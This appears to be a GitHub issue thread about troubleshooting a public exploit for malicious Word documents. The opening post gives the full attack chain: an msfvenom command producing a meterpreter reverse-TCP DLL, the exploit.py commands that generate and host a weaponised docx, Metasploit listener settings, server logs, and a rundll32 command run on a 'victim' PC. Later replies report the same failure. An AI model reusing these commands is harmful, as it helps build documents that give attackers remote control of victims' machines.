Metasploit not sending stage

[oflavioc]

I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll

Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi

Shared the docx with my victim PC and set metasploit as listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444

Setup the server to trasmit other files: sudo python3 exploit.py host 80

File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:

xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -

But metasploit keeps os listening state, with no changes.

If I execute on victim's powershell the command: rundll32 print.dll, start
Metasploit set the stage successfuly and I can control the victim's PC, which indicates the dll is not the issue.

Any tips on how to troubleshoot?

[happyfoxice]

I'm observing the same thing where it works and doesn't work. Testing on Win10, I can see the inf is dropped in AppsData\Local\Temp and other times it's not. I see a consistent creation of a *.dat and *.tmp files. Sometimes closing the docx, rundll32 remains and msword.inf is locked until I kill rundll32.

[DungLeMTA]

Could we solve it ?
I also get the same problem

[ST0new]

遇到同样的问题，有解决方案吗